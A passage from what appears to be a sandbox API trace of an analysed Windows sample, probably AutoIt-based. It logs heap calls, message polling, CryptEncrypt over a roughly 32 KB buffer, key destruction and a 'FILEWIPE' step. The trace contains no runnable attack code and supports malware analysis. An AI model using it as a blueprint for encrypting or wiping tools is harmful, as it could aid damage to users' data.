HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.241] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da308, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da308*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.241] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.241] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.241] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0036.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.241] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.241] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.242] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.242] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.242] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.242] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.242] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.242] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.242] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.242] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.242] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.242] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.242] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.242] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.243] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x7df0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x7e00) returned 1 [0036.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.243] CharLowerBuffW (in: lpsz="byte[32257]", cchLength=0xb | out: lpsz="byte[32257]") returned 0xb [0036.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.244] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.244] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x96ca00*, pdwDataLen=0x6ae220*=0x7df0, dwBufLen=0x7e00 | out: pbData=0x96ca00*, pdwDataLen=0x6ae220*=0x7e00) returned 1 [0036.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.244] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.244] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.244] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.244] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.245] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.245] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.245] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.245] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.245] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.245] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0036.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.247] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.247] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.247] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.255] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.255] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.255] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.255] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.255] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.255] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0036.255] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.255] CryptDestroyKey (hKey=0x7c2200) returned 1 [0036.256] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.256] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.256] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.256] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.256] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.256] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.256] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.256] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0036.256] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.256] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.256] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.256] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.256] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.256] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.257] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.257] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.257] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.257] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.257] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.257] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.257] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.257] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.257] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.257] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.257] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0036.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.257] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.257] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0036.257] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.258] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.258] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.258] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0036.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0036.258] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.258] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.258] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.260] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.260] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0036.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 